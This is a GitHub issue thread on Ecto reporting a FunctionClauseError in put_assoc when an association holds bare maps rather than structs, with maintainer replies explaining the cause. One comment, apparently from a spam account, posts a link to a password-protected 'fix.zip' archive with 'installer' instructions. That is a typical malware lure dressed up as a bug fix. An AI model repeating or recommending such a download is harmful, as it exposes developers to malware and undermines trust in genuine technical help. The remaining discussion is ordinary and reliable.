### ISSUE TITLE
Error in put_assoc when creating a resource and modifying a list with default values

### ISSUE THREAD

**Issue by Awlexus** [elixir-ecto/ecto#4501]
### Elixir version

Erlang/OTP 26 [erts-14.1.1] [source] [64-bit] [smp:6:6] [ds:6:6:10] [async-threads:1] [jit:ns]  Elixir 1.15.7 (compiled with Erlang/OTP 26)

### Database and Version

Postgresql 16

### Ecto Versions

3.11.2, but also reproducable with 3.12.2

### Database Adapter and Versions (postgrex, myxql, etc)

0.19.1

### Current behavior

This behaviour is rather difficult to reproduce. 

The association is set up like this in my case:
```elixir
many_to_many :tags, Tags,
  join_through: "tags_join_table",
  on_replace: :delete,
  preload_order: [:position],
  join_keys: [...]
```

Then when creating the changeset I base it on a resource that already has a tag assigned
```elixir
post = %Post{tags: [%{id: 1}]}
changeset = Blog.change_blog_post(post)
```

In the html form, I submit the list of tags as a list of IDs (`["1", "2", ...]`). During validation (on change), I do the following to load the tags and put them into the changeset.

```elixir
def handle_event("validate", %{"post" => post_params}, socket) do
  changeset = Block.change_blog_post(socket.assigns.post, params)
  ...

# Inside the changeset
defp validate_tags(changeset) do
  case changeset.params["tags"] do
    [_ | _] = tags ->
      put_assoc(changeset, :tags, Repo.all(from t in Tag, where: t.id in ^tags))
     ...
   end
end
```

With this setup, one can create an error by removing the original tag from the list and adding a new one:
```
** (FunctionClauseError) no function clause matching in Ecto.Changeset.change/2
(ecto 3.11.2) lib/ecto/changeset.ex:469: Ecto.Changeset.change(%{id: 1}, %{})
(ecto 3.11.2) lib/ecto/changeset/relation.ex:275: Ecto.Changeset.Relation.on_replace/2
(ecto 3.11.2) lib/ecto/changeset/relation.ex:419: Ecto.Changeset.Relation.reduce_delete_changesets/5
(ecto 3.11.2) lib/ecto/changeset/relation.ex:173: Ecto.Changeset.Relation.change/3
(ecto 3.11.2) lib/ecto/changeset.ex:1885: Ecto.Changeset.put_change/7
(ecto 3.11.2) lib/ecto/changeset.ex:2131: Ecto.Changeset.put_relation/5
```

### Note
While writing this issue, I noticed the error does not happen if the initial post is given a list of structs, instead of maps:
```elixir
post = %Post{tags: [%Tag{id: 1}]}
changeset = Blog.change_blog_post(post)
```
IMO, because there's an easy to apply solution, I don't think this it's important to resolve this issue

### Expected behavior

No error is generated

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by greg-rychlewski** [comment]
Thanks for the report. You're correct this is the issue:

```elixir
%Post{tags: [%{id: 1}]}
```

Basically a bare map like this is not a valid data type for the association. So when Ecto is comparing what exists to what you are submitting and performing the `on_replace` behaviour it can't function properly.

**Comment by josevalim** [comment]
Yes, we expect that, when setting fields directly in structs, that those values are valid. If you don't set them correctly, then they will fail as above. I don't think we should add safe handling for this, it is expected for the struct fields to be valid. Thanks for the report!
